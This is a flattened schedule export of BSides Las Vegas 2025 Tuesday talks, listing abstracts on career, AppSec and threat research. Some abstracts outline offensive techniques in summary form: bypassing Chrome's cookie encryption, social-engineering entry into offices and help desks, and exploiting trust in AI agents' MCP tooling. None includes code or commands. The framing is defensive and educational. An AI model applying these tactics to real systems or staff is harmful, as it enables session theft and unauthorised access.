Cyber threats have evolved into a credible risk to global financial stability. This talk explores fundamental vulnerabilities that are always present in our IT and information security systems, making those systems susceptible to disruptions that could spark future financial crises. These vulnerabilities amplify the risk that CVEs pose. The vulnerabilities give rise to IT systems that are complex, deeply interconnected, and leveraged, yet assumed to be resilient—until a cyberattack proves otherwise by disrupting critical business operations. Drawing on real-world examples and recent research, the talk illustrates the presence of those vulnerabilities in IT systems and how those same vulnerabilities are also always present in the financial system, making it susceptible to financial crises. The talk closes with a description of similar steps that can build resilience in the financial system as well as in IT and information security systems. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/9FF3LX/ Florentine A Stacey Schreft PUBLISH DCPYU7@@pretalx.com -DCPYU7 What Should CVE Be When It Grows Up? en en 20250805T130000 20250805T134500 004500

What Should CVE Be When It Grows Up?

A 45-minute moderated discussion featuring Bob Lord. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/DCPYU7/ Florentine A Jerry Gamblin Madison Ficorilli Bob Lord Tod Beardsley Chris Butera PUBLISH HEYP9S@@pretalx.com -HEYP9S Stealing Browser Cookies: Bypassing the newest Chrome security measures en en 20250805T140000 20250805T144500 004500

Stealing Browser Cookies: Bypassing the newest Chrome security measures

This session explores advanced security mechanisms implemented by major browsers to prevent cookie theft from their storage databases. Chrome has recently implemented AppBound encryption, which provides multi-layered protection for session cookies: 1) A 2-way DPAPI encryption system that operates with both elevated NT AUTHORITY\SYSTEM permissions and normal user-level decryption capabilities; 2) A state-key encryption layer utilizing the ChaCha20Poly1305 algorithm with custom keys (that once was AES-256-GCM encrypted); These implementations have significantly reduced the effectiveness of info-stealing malware. However, this session will demonstrate potential vulnerabilities in these security measures and explain how to obtain decrypted cookies despite these protections. We will examine the new format specifications and encryption methodologies for cookies. Beyond Chromium-based browsers, we'll explore Gecko's encryption algorithms, which involve structured ASN.1 data formats with multiple encryption schemes including 3DES and AES-256. We'll also analyze Chromium on macOS which relies on PBKDF2 key derivation, and WebKit-based browsers that store cookies in binary cookie files. Additionally, we'll discuss Chrome's forthcoming "Device Bound Session Cookies" (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/HEYP9S/ Florentine A Rafael Felix PUBLISH YSW7SD@@pretalx.com -YSW7SD The Protocol Behind the Curtain: What MCP Really Exposes en en 20250805T150000 20250805T154500 004500

The Protocol Behind the Curtain: What MCP Really Exposes

This presentation aims to shed light on the overlooked security challenges posed by MCP. Drawing from recent analyses and vulnerabilities, we will explore how the protocol's design choices, while facilitating integration, inadvertently open doors to exploitation. Key points include: Understanding MCP's Architecture: A breakdown of how MCP connects AI agents to external tools and the trust assumptions involved. Exploiting Trust: Demonstrations of how malicious actors can leverage MCP's features to execute unauthorized actions. Mitigation Strategies: Discussion of proposed frameworks and best practices to secure MCP implementations, including the Agent Security Framework and MCP Guardian. Attendees will leave with actionable insights into securing their AI integrations and a deeper appreciation for the importance of protocol-level security considerations. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/YSW7SD/ Florentine A Srajan Gupta Vinay Kumar PUBLISH KA7TAR@@pretalx.com -KA7TAR Inside the Open-Source Kill Chain: How LLMs Helped Catch Lazarus and Stop a Crypto Backdoor en en 20250805T170000 20250805T174500 004500

Inside the Open-Source Kill Chain: How LLMs Helped Catch Lazarus and Stop a Crypto Backdoor

This talk presents findings from a multi-year research project that applied Large Language Models (LLMs) to real-world threat detection in the open-source software ecosystem. Rather than theorizing about AI’s future role in security, this work focuses on practical applications—showing how LLMs can be deployed today to detect vulnerabilities and malware that bypass traditional scanners, rulesets, and threat feeds. The project centered around two key threat surfaces: - Silently patched vulnerabilities in popular open-source libraries - Malware published to package registries such as NPM and PyPI **LLM Pipeline: Silent Patch Detection** The first LLM pipeline was designed to analyze changelogs across thousands of open-source projects to identify likely security patches that were fixed but never disclosed (a practice often referred to as "silent patching"). This pipeline involved two stages: LLM 1: Changelog Standardization and Parsing - Changelogs vary wildly in structure, format, and tone—often written in markdown, HTML, or plaintext, hosted in GitHub, docs sites, or even PDFs. We used an LLM to extract, standardize, and structure this unbounded data into a consistent schema. This model also flagged ambiguous or security-relevant language (e.g., “stability fix”, “edge case resolved”) that would be easily overlooked by regex or keyword rules. LLM 2: Patch Classification - The parsed changelog entries were then passed to a second model trained to classify whether a given commit or entry was likely to contain a security fix, even if no security keywords were used. The model was tuned to be sensitive to euphemistic phrasing and changelog norms. High-confidence results were sent to human reviewers who reverse-engineered the patch to confirm and rate severity. Findings: This system uncovered over 900 silently patched vulnerabilities, many in major packages like Axios, Apache ECharts, and Chainlit. - 67% never obtained a CVE or were published in any vulnerability databases - 25% were rated high or critical severity - Examples included a critical path traversal bug, stored XSS, and a prototype pollution issue exploitable via browser inputs. - These vulnerabilities would have gone completely undetected by CVE-based tools **LLM Pipeline: Malware Detection in Registries** The second LLM-based detection pipeline was used to scan all newly published and updated packages on public registries, primarily NPM and Pypi. LLM 1: Metadata Anomaly Detection - This model ingested human-written data such as README files, descriptions, contributor metadata, and author behavior. It was trained to identify inconsistencies, abnormal phrasing, typosquatting patterns, and red flags in descriptions (e.g., toolsets pretending to be SDKs with unrelated language or package names mimicking popular libraries with low-quality documentation). LLM 2: Orchestration and Triage - The second LLM acted as an orchestrator of static scanning tools. We capture over 30 weighted indicators by running various static scans on the code. The LLM then uses these indicators and indicators from the previous model to decide whether to mark the package immediately as malware or escalate the package to a human researcher. Findings: - Over 600 malicious packages were discovered in a single month (March 2025). - Detection time averaged 5 minutes post-publish, compared to 10+ days for OpenSSF. Most common techniques included: - Encoded payloads decoded at runtime - Time-delayed execution using setTimeout() - Clipboard hijackers and credential stealers - Obfuscated C2 infrastructure, often hidden in build scripts **Notable Case Studies** Lazarus Group NPM Campaign - The pipeline flagged a malicious package (react-html2pdf.js) uploaded to NPM containing obfuscated code and an embedded C2 call. We observed the attacker—later attributed to Lazarus Group—re-uploading new variants every 10 minutes, likely debugging live. We reported the campaign before a functional version was deployed. Ripple SDK Backdoor - A malicious version of the official Ripple SDK (@xrplf/xrpl) was published by a compromised maintainer token. It included a Node.js-only backdoor that connected to an external C2 server and stole private crypto keys. Detection occurred within minutes, and coordination with Ripple and NPM teams prevented what could have had a catastrophic impact on the crypto community. Rand-User-Agent RAT Supply Chain Campaign - In this campaign, attackers uploaded a popular NPM package was compromised via a dev token and a Remote Access Trojan (RAT) was injected into the project. The malware sent outbound C2 traffic using a randomized User-Agent string to evade common detection heuristics and proxy logs. It also used system profiling logic to avoid execution in CI/CD environments. This was not detected by any other databases even after 10 days from the malicious contribution. This talk provides a deep technical look into how LLMs can assist in detecting real threats. It also focuses on how this research can be replicated using currently available frontier out-of-the-box models like GPT-4. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/KA7TAR/ Florentine A Mackenzie Jackson PUBLISH FXLWKJ@@pretalx.com -FXLWKJ Laser Beams & Light Streams: Letting Hackers Go Pew Pew, Building Affordable Light-Based Hardware Security Tooling en en 20250805T180000 20250805T184500 004500

Laser Beams & Light Streams: Letting Hackers Go Pew Pew, Building Affordable Light-Based Hardware Security Tooling

Stored memory in hardware has had a long history of being influenced by light, by design. For instance, as memory is represented by the series of transistors, and their physical state represents 1's and 0's, original EEPROM memory could be erased via the utilization of UV light, in preparation for flashing new memory. Naturally, whilst useful, this also has proven to be an avenue of opportunity to be leveraged by attackers, allowing them to selectively influence memory via a host of optical/light-based techniques. As chips became more advanced, the usage of opaque resin was used as a "temporary" measure to combat this flaw, by coating chips in a material that would reflect undesirable UV. Present day opinions are that laser (or light) based hardware attacks, are something that only nation state actors are capable of doing; due to both limitations of cost in tooling as well as personnel expertise required. Currently, sophisticated hardware labs use expensive, high frequency IR beams to penetrate the resin. This project demonstrates that with a limited budget and hacker-and-maker mentality, similar results can be obtained at a fraction of the cost, from the comfort of your home or garage. With the modifications of an opensource low-cost microscope, addition of a home-built beam splitter and interchangeable diode laser, it has been shown that consumer-grade diodes are capable of producing results similar to the high-cost variants, such as the YAG lasers. One example of results includes introducing affordable avenues to conduct laser-based fault injection, via the usage of such budget-friendly tooling. We are opening the study of these low-level hardware attacking methodologies to more entry-level security testers, without the need for hundreds of thousands of dollars in startup capital. By leveraging more inexpensive technology alternatives, we have embarked on a mission to unveil hardware malware, detect supply chain chip replacements, and delve into the realm of laser logic state imaging. Our approach integrates optics, laser selection, and machine learning components. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/FXLWKJ/ Florentine A Larry Trowell Sam "PANTH13R" Beaumont PUBLISH JPPBAZ@@pretalx.com -JPPBAZ Interview Like a Legend: No Slides, Just Vibes en en 20250805T100000 20250805T104500 004500

Interview Like a Legend: No Slides, Just Vibes

Resumes are fine. But they don’t get you hired - you do. In this fast-paced, no-fluff talk, cybersecurity hiring manager and mohawked chaos gremlin John Stoner breaks down how to stop bombing interviews and start showing up like the badass candidate you are. With 25+ years in national security and cybersecurity - and hundreds of interviews under his belt - John will walk you through what actually works in an interview setting, based on real-world hiring across federal and commercial roles. We’ll cover: • Why resumes don’t matter as much as you think • How preparation (not memorization) makes you stand out • What stories to rehearse—including your two-minute “tell me about yourself” • How to answer both technical and non-technical questions without sounding like a robot • What questions you should ask—and why you're interviewing them, too No slides, just memes, tough love, and the kind of advice you wish someone had given you sooner. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/JPPBAZ/ Florentine B John Stoner PUBLISH R3CW7R@@pretalx.com -R3CW7R Hire Ground Resume Reviews, Tuesday Lunch Break en en 20250805T130000 010000

Hire Ground Resume Reviews, Tuesday Lunch Break

Hire Ground Resume Reviews, Tuesday Lunch Break PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/R3CW7R/ Florentine B PUBLISH KVJZHT@@pretalx.com -KVJZHT Beyond the Command Line: Transitioning from Individual Contributor to Leader en en 20250805T130000 004500

Beyond the Command Line: Transitioning from Individual Contributor to Leader

The cybersecurity industry is at a crossroads. While technical expertise remains crucial, organizations increasingly need strong leadership to guide teams, manage complexity, and drive security initiatives forward. However, transitioning from an individual contributor to a leadership role is one of the most difficult career shifts in cybersecurity. Many professionals who excel in technical roles find themselves promoted into management without the necessary training or guidance, leading to frustration, burnout, and ineffective leadership. I believe this talk is a good fit for the Hire Ground track because it directly addresses a widespread and often overlooked challenge in cybersecurity careers: the leadership gap. Technical skills alone do not prepare professionals to manage people, handle conflict, delegate work, or communicate effectively with executives. Without the right support and education, new leaders struggle to balance their technical expertise with the soft skills required for management. The result? Teams suffer, projects falter, and promising cybersecurity professionals leave leadership roles prematurely, contributing to industry-wide retention challenges. The key to addressing the leadership gap in cybersecurity is deliberate preparation, skill development, and structured mentorship—not just learning on the job through trial and error. This discussion will provide a real-world roadmap for technical professionals stepping into leadership roles, equipping them with practical strategies to lead effectively while maintaining credibility and confidence. 1. Mindset Shift: Attendees will learn how to redefine success in leadership—moving from personal technical achievements to enabling and empowering their teams. 1. Essential Leadership Skills: The session will cover communication, delegation, decision-making, and conflict resolution, ensuring new leaders are prepared for the human-side of cybersecurity leadership. 1. Navigating Common Challenges: Managing former peers, avoiding micromanagement, handling imposter syndrome, and balancing hands-on work with strategic leadership will be key focus areas. 1. Building a Leadership Style: Attendees will explore different leadership approaches, helping them develop an authentic leadership identity that plays to their strengths. 1. Long-Term Growth & Retention: The discussion will emphasize mentorship, professional development, and continuous learning, ensuring new leaders don’t just survive in their roles—but thrive while fostering stronger teams and a healthier cybersecurity industry. I feel that by leading this structured discussion, I can help empower attendees with actionable insights to confidently step into leadership roles, strengthening both their individual careers and the broader cybersecurity ecosystem. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/KVJZHT/ Florentine B Leo Pate PUBLISH E39UKP@@pretalx.com -E39UKP Your Interview Game is Weak: Gamifying Technical Interviews through Role-Playing en en 20250805T140000 20250805T144500 004500

Your Interview Game is Weak: Gamifying Technical Interviews through Role-Playing

As the ways of working have changed to include hybrid and remote arrangements on a more regular basis, the interview process has not kept pace. No longer are candidates sitting in a conference room being asked to do technical challenges in person. Instead, they are interviewing virtually, where assessing IQ and EQ (emotional intelligence) can be even more different. Yet in this distributed environment, EQ skills such as meeting engagement and communication are crucial to success, and the expectations of these abilities have increased. According to the 2025 CareerPlug Candidate Experience Report, “26% of candidates declined an offer due to a poor experience.” Additionally the report found that “91% of candidates said a positive candidate experience influenced their decision to accept an offer.” No longer is the outdated stereotype of a software engineer who hides behind a computer a viable option. Instead, people must now possess both technical skills and the ability to communicate clearly with other teams, presenting their areas of discipline coherently and regularly. By creating a fictitious organization and characters specifically crafted to interact with the interviewee, cross-team dynamics and organizational challenges can be effectively incorporated, enriching the experience for all involved. The central component of this is the Non-Playing Interviewers or NPIs. Each NPI is specifically crafted to come with a backstory, notifications, and alignments. In other words, the NPI will react based on responses from the interviewee and will be more or less inclined to take one approach or another based on how other NPIs are reacting. The interview itself consists of challenges, all of which represent actual tasks expected of the role. These challenges are intentionally designed to allow for dynamic gameplay, depending on the approach the interviewee takes. For example, while an interviewee with heavy AWS experience might respond in one way, an interviewee with a greater focus on software development might respond in a completely different way, and the challenges are fluid enough to provide each interviewee a rich environment in which to navigate. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/E39UKP/ Florentine B Matt Torbin PUBLISH 8DZ7DR@@pretalx.com -8DZ7DR Root To CISO or not? en en 20250805T150000 20250805T154500 004500

Root To CISO or not?

“Root to CISO or Not” Not everyone dreams of becoming a CISO—some of us are just trying to avoid pager fatigue… and federal indictments. Join us for a fun and insightful panel featuring two experienced CISOs and a cybersecurity recruiter as they explore the many career paths in cybersecurity, from hands-on technical roles to leadership positions. This session will highlight how professionals can grow within the field, pivot between specialties, and decide whether the CISO track is the right fit—or if life might be better without the liability insurance. You’ll hear real-world career lessons, practical guidance, and a few laughs about the highs, lows, and unexpected twists of navigating a cybersecurity career. Whether you’re aiming for the big chair or just trying to figure out your next move, this panel will offer clarity, encouragement, and the kind of candid advice you won’t get from a job description. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/8DZ7DR/ Florentine B Ray Espinoza Kris Rides Jake Bernardes PUBLISH UYXVAU@@pretalx.com -UYXVAU The World Famous Hire Ground Panel, Tuesday Edition en en 20250805T160000 20250805T162500 002500

The World Famous Hire Ground Panel, Tuesday Edition

The World Famous Hire Ground Panel, Tuesday Edition PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/UYXVAU/ Florentine B Kirsten Sireci Renner Kris Rides Heather Morris Noelle Hori PUBLISH HNE73Q@@pretalx.com -HNE73Q Hire Ground Resume Reviews, Tuesday Evening en en 20250805T160000 20250805T165000 005000

Hire Ground Resume Reviews, Tuesday Evening

Free resume reviews in Hire Ground. PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/HNE73Q/ Florentine B PUBLISH JZQS7X@@pretalx.com -JZQS7X Hire Ground Mixer, Tuesday en en 20250805T170000 20250805T185000 015000

Hire Ground Mixer, Tuesday

Hire Ground Mixer, Tuesday PUBLIC CONFIRMED Event2HR https://pretalx.com/security-bsides-las-vegas-2025/talk/JZQS7X/ Florentine B PUBLISH 3HTVUE@@pretalx.com -3HTVUE Silent Auction Opens, Tuesday en en 20250805T083000 20250805T083000 000000

Silent Auction Opens, Tuesday

Silent Auction Opens PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/3HTVUE/ Florentine C+D PUBLISH G3YLV8@@pretalx.com -G3YLV8 Middle Ground Opens, Tuesday en en 20250805T083000 20250805T083000 000000

Middle Ground Opens, Tuesday

Middle Ground Opens, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/G3YLV8/ Florentine C+D PUBLISH 8C8L37@@pretalx.com -8C8L37 PvJ CTF Play Begins, Tuesday en en 20250805T090000 000000

PvJ CTF Play Begins, Tuesday

PvJ CTF Play Begins, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/8C8L37/ Florentine C+D PUBLISH FYECDX@@pretalx.com -FYECDX Morning Talks, Tuesday en en 20250805T100000 013000

Morning Talks, Tuesday

Morning Talks, Tuesday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/FYECDX/ Florentine C+D PUBLISH GXWDKT@@pretalx.com -GXWDKT Lunch Break, Tuesday en en 20250805T123000 20250805T140000 013000

Lunch Break, Tuesday

Lunch, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/GXWDKT/ Florentine C+D PUBLISH UC7LUT@@pretalx.com -UC7LUT Afternoon Talks, Tuesday en en 20250805T140000 020000

Afternoon Talks, Tuesday

Afternoon Talks, Tuesday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/UC7LUT/ Florentine C+D PUBLISH 93LS3Z@@pretalx.com -93LS3Z PvJ CTF Play Ends, Tuesday en en 20250805T160000 000000

PvJ CTF Play Ends, Tuesday

PvJ CTF Play Ends, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/93LS3Z/ Florentine C+D PUBLISH TLBCVD@@pretalx.com -TLBCVD Happy Hour, Tuesday, Sponsored by Stroz Friedberg en en 20250805T160000 20250805T170000 010000

Happy Hour, Tuesday, Sponsored by Stroz Friedberg

Happy Hour, Tuesday, Sponsored by Aon PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/TLBCVD/ Florentine C+D PUBLISH LAGWF8@@pretalx.com -LAGWF8 Silent Auction Closes, Tuesday en en 20250805T160000 20250805T160000 000000

Silent Auction Closes, Tuesday

Silent Auction Closes PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/LAGWF8/ Florentine C+D PUBLISH 7DPHDW@@pretalx.com -7DPHDW PvJ CTF Hotwash, Tuesday en en 20250805T170000 003000

PvJ CTF Hotwash, Tuesday

PvJ CTF Hotwash, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/7DPHDW/ Florentine C+D PUBLISH VPWFH3@@pretalx.com -VPWFH3 Evening Talks, Tuesday en en 20250805T170000 020000

Evening Talks, Tuesday

Evening Talks, Tuesday PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/VPWFH3/ Florentine C+D PUBLISH VC8TXB@@pretalx.com -VC8TXB Middle Ground Closes, Tuesday en en 20250805T190000 000000

Middle Ground Closes, Tuesday

Middle Ground Closes, Tuesday PUBLIC CONFIRMED Event1HR https://pretalx.com/security-bsides-las-vegas-2025/talk/VC8TXB/ Florentine C+D PUBLISH 9HEEBE@@pretalx.com -9HEEBE Thinking Outside the SOC: Structured Analytics for the Overloaded Cyber Analyst en en 20250805T100000 20250805T104500 004500

Thinking Outside the SOC: Structured Analytics for the Overloaded Cyber Analyst

As cybersecurity professionals who have applied intelligence methodologies to enhance our defensive capabilities, we've found that structured analytic techniques significantly improve threat detection and response. While we both work in cybersecurity roles, we've integrated traditional intelligence frameworks to overcome common analytical challenges faced by security teams. This talk distills our practical experience into actionable techniques that any analyst can apply immediately. Our journey with these techniques began after encountering recurring cognitive biases affecting incident analysis and threat assessment. Modern security operations face overwhelming data volumes, complex attribution challenges, and adversaries practicing deliberate deception - creating a perfect storm for analytical failure. By combining established methodologies from the intelligence community with cybersecurity practices, we've identified effective approaches that address these critical pain points without requiring extensive retraining or resource investment. The core of our presentation revolves around several powerful structured techniques that we've found invaluable in security operations. These approaches help analysts systematically evaluate attribution evidence, test assumptions about threat actor capabilities, and establish strategic warning systems that go beyond technical indicators. In our experience, applying these methods leads to significant reductions in false positives and improvements in attribution accuracy when teams implement them correctly. We'll demonstrate how specific SATs address everyday cybersecurity challenges, including attribution analysis, assumption testing, and anticipating threat actor movements. Attendees will receive practical examples and approaches they can adapt to their own environments, along with case studies demonstrating tangible improvements in detection accuracy and analytical rigor. The presentation includes detailed walkthroughs of real-world scenarios where these structured methods enhance threat detection and response, providing concrete examples that security teams can adapt to their unique requirements. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/9HEEBE/ Florentine E Alina Thai Haily Beem PUBLISH 3ERMMC@@pretalx.com -3ERMMC Securing Frontends at Scale: Paving our Way to the Post-XSS World en en 20250805T110000 20250805T112000 002000

Securing Frontends at Scale: Paving our Way to the Post-XSS World

**We marked (20 minutes) as a preference in the form but we are flexible on the talk length of the "Breaking Ground" format!** Over the last decade, we have been working on a solution at-scale for injection attacks against frontend codebases that could generalize across thousands of webapps-- and we've spent quite a bit of time rolling out these mitigations to all these products! We want to share the great wealth of applied knowledge gathered from all this experience with all web developers and security professionals. We have presented these philosophical ideas at other talks before, but the format of the "Breaking Ground" talks was especially fascinating to us! We spent a lot of time thinking about what the most useful approaches of our internally-honed approaches and tooling were, and spent some time developing external/OSS versions of it to benefit the ecosystem-- and based on some other talks covering some of these tools went, we thought a more interactive demo-based format where we could be closer to the audience would drive the point of how easily applicable these mitigation approaches are in the developer lifecycle. Some demos we are planning, especially focused on how it fits into web security: * https://github.com/google/strict-csp * https://www.npmjs.com/package/safevalues * https://www.npmjs.com/package/tsec * https://github.com/google/safety-web * https://github.com/google/trusted-types-helper And given the demo-heavy nature of this session, we will also show in action some AI-automated approaches-- where used in conjunction with these tools-- can really supercharge the mitigations that you can run across your webapp codebase! PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/3ERMMC/ Florentine E Aaron Shim PUBLISH N7BLLW@@pretalx.com -N7BLLW XSS is dead - Browser Security Features that Eliminate Bug Classes en en 20250805T140000 20250805T142000 002000

XSS is dead - Browser Security Features that Eliminate Bug Classes

I also submitted this talk as a workshop as I do have great set of practical challenges for it created. But I would also (,if the workshop isn't accepted) present this as a talk as I can also pitch this new approach and idea as talk. With the new OWASP Proactive Controls list now including C6 browser security, it’s the perfect time to focus on prevention instead of endless patching. I first ran this as a workshop inside my own organization, and even experienced AppSec leads found it eye-opening. The idea was inspired by some work happening behind closed doors at Google, they basically influenced the standards that we are talking about. One of the things made public was the Security Signals research paper by Google. I took those ideas, built on them, and created a hands-on training with practical challenges using those new features to secure an app in-depth, aside from the traditional securing the challenges rely on the browser features. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/N7BLLW/ Florentine E Javan Rasokat PUBLISH RBLK3C@@pretalx.com -RBLK3C Infiltrating Like a Ninja: Unveiling Detection Gaps in Physical Security Across Japan and the U.S en en 20250805T143000 20250805T145000 002000

Infiltrating Like a Ninja: Unveiling Detection Gaps in Physical Security Across Japan and the U.S

- Introduction (Background & Motivation) Incidents such as the large-scale DarkVishnya compromise—where malicious devices were planted onsite—and the leaked i-soon documents referencing suspicious hardware underscore how physical breaches, combined with social engineering, present a very real threat to enterprises. However, compared to digital security, the sharing of knowledge regarding physical defenses remains limited. This session offers comparative insights drawn from multiple physical penetration tests (pentests) conducted in both Japan and the United States, highlighting unique lessons from each region’s security practices. - Presenter Background Let me provide some background about our presenters. One of them is the lead for physical security in Japan team. Another is a professional who has handled numerous projects in the U.S. And finally, we have a member of the Counter Threat Unit team, who is well-known here in Japan. - Overview of Physical Penetration Testing - Definition and Purpose By simulating real-world attacks—such as social engineering, RFID cloning, or other hardware-based compromises—physical pentests assess the risk of adversaries gaining physical access to internal networks and systems. - Common Techniques These methods include not only direct system-level attacks (e.g., RFID cloning, wireless hacking) but also “soft” tactics like tailgating and leveraging employees’ goodwill. While such techniques require finesse, the presenters have achieved a 100% success rate in certain scenarios, underlining the pivotal role of human-factor vulnerabilities. - Case Studies in Japan - Cultural Background Japan’s low crime rate fosters a pervasive atmosphere of trust, with employees seldom challenging unfamiliar individuals in office settings. - Security Measures Although many organizations employ ID badges, gates, and other formal systems, employee vigilance is generally lacking, allowing attackers to easily install rogue devices or malware once inside. - Intrusion Example Even offices equipped with security guards, flap-gate turnstiles, and front-desk check-ins can be bypassed through social engineering. We will demonstrate how posing as a “late employee without a badge” or someone “rushing to a meeting” effortlessly exploits well-intentioned staff eager to assist. - Case Studies in the United States - Cultural Background In contrast to Japan, the U.S. experiences higher crime rates and stricter liability concerns, prompting more rigorous security measures such as patrol guards and extensive surveillance. - Security Measures Access privileges are firmly segmented, suspicious individuals are quickly challenged, and armed guard patrols are common. One speaker will recount how a colleague was immediately approached by security on the first day of a U.S. engagement, illustrating the prevalent “challenge” culture. - Intrusion Example Despite these robust defenses, carefully crafted social engineering frequently succeeds. Whether by engaging in conversation to clone RFID badges, tailgating into restricted areas, or calling a help desk for sensitive details like BitLocker keys, attackers can exploit the same human-factor weaknesses seen in Japan—thus compromising critical corporate assets. - Comparative Analysis - Key Differences Japanese organizations may be undermined by cultural deference, whereas stricter enforcement characterizes the U.S. Even so, no system is impervious. - Common Weakness Human psychology remains the ultimate vulnerability. No matter how advanced the controls, a deceived or empathetic employee can inadvertently grant attackers entry. - Conclusion Physical security hinges not only on locks and guards but also on workplace culture and employee awareness. This presentation emphasizes the need for frequent physical pentests, practical training, and fostering what we term “friendly vigilance.” Drawing from real successes—and failures—across both Japan and the U.S., we will propose concrete countermeasures and strategic frameworks to help organizations stay ahead of evolving threats. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/RBLK3C/ Florentine E You Nakatsuru Fumiya Imai Viet Luu PUBLISH YXZYXG@@pretalx.com -YXZYXG Vibe Check: The dark side of vibe coding en en 20250805T150000 20250805T154500 004500

Vibe Check: The dark side of vibe coding

This presentation talk came from months of Megan and I sharing concerns between the two of us on what we've been hearing colleagues say, examples of vibe coding failures on x/reddit, and our overall concerns for the future of the industry. What will cybersecurity look like if all the professionals are inhibited by a lack of understanding of foundational technical and security topics while having executives who think that AI is the answer for everything. We'll have two live demos plus room for discussions because we have lots of thoughts about the current state of vibe coding and what a more secure vibe coding future could look like that doesn't detract from foundation understanding of the underlying technology of everything. Also, the demos will be live, but we’ll pre-record them before coming in in case anything goes wrong. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/YXZYXG/ Florentine E Chloe Potsklan Megan Kaczanowski PUBLISH QYKC7A@@pretalx.com -QYKC7A We Fight for the User's... Session en en 20250805T170000 20250805T174500 004500

We Fight for the User's... Session

Protecting the session token may seem mundane, but personal experience has shown that developer's boredom with implementing the same old defenses ends up leading to noteworthy vulnerabilities far too often. Given the BSides audience, my goal is less about convincing the audience of the importance, as arming them with succinct statements in support of the controls they can take back to their organizations and win some battles. The new technique to be covered, Device Bound Session Credentials, have a huge advantage over traditional session tokens in that they can't be "stolen" or at least not taken off the device (it's in the name). Of course, as with any technology, being a good one doesn't mean that it's going to be adopted. By explaining the proposed standard in detail, I hope to generate conversation around it and either contribute my small part to either its adoption or rejection if a better standard can be found. A version of this talk was given at SaintCon 2024 (https://www.youtube.com/watch?v=Qo6KQ7SH6wo), but I plan on amping up the technical side, particularly around how the DBSC protocol actually works. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/QYKC7A/ Florentine E Mark Hoopes PUBLISH 99QGN8@@pretalx.com -99QGN8 A Cheat Code for Security Programs en en 20250805T180000 20250805T184500 004500

A Cheat Code for Security Programs

This is the presentation I wish I could have given to myself when I was a starting AppSec professional. Product Security is a larger domain and discipline in the universe of InfoSec. It spans everything from an http request to silicon hardware. It enumerates every multidimensional aspect of the product, through all phases of that product's lifespan. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/99QGN8/ Florentine E Ochaun Marshall PUBLISH SZWXFF@@pretalx.com -SZWXFF The Unbearable Weight of Commercial Licensing. Combining Closed Systems with Open Source Defense en en 20250805T100000 20250805T104500 004500

The Unbearable Weight of Commercial Licensing. Combining Closed Systems with Open Source Defense

This talk came out of wanting to get back to Linux and open source communities after working with Microsoft Defender, Intune, Entra, and the rest of the Microsoft 0365 world for years. (So frustrating!) I wanted to better deal with my frustration with closed source “solutions” at work to gain more power over alerts, as well as make the investigation and triage process more efficient. I had forgotten the joy of working with the terminal after getting clobbered with Wacatac alerts. (Searching for Wacatac leads to Microsoft marketing documentation that tells you that Microsoft Defender can defend against it.) Some jobs don’t have the ability to choose over what security tools are being used, so one must assess and see if the situation can be made better. That’s the background behind this talk. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/SZWXFF/ Florentine F Keya Arestad PUBLISH ZPH8MR@@pretalx.com -ZPH8MR Rewriting the Playbook: Smarter Vulnerability Management with EPSSv3, CVSSv4, SSVC & VEX Frameworks en en 20250805T110000 20250805T112000 002000

Rewriting the Playbook: Smarter Vulnerability Management with EPSSv3, CVSSv4, SSVC & VEX Frameworks

